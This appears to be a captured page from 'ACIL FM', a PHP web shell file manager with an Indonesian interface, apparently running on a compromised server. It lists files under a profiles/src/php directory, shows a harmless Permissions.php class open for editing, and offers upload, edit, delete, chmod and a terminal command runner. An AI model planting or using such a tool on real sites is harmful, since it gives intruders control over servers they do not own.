ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/profiles/src/php
/
home
mhhtmff
profiles
src
php
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Business_profiles_view.php
3.99 MB
chmod
View
DL
Edit
Rename
Delete
Database.php
545 B
chmod
View
DL
Edit
Rename
Delete
Permissions.php
487 B
chmod
View
DL
Edit
Rename
Delete
Profiles.php
1.42 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/profiles/src/php/Permissions.php
<?php require "Profiles.php"; class Permissions extends Profiles { public function check_permissions($hash) { if(strlen($hash) != 5) { echo "Hash is invalid!"; exit; } $check_result = $this->check_hash($hash); if($check_result == "HashNotFound") { echo "Hash not found"; return false; } else if ($check_result == "HashFound") { return true; } } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply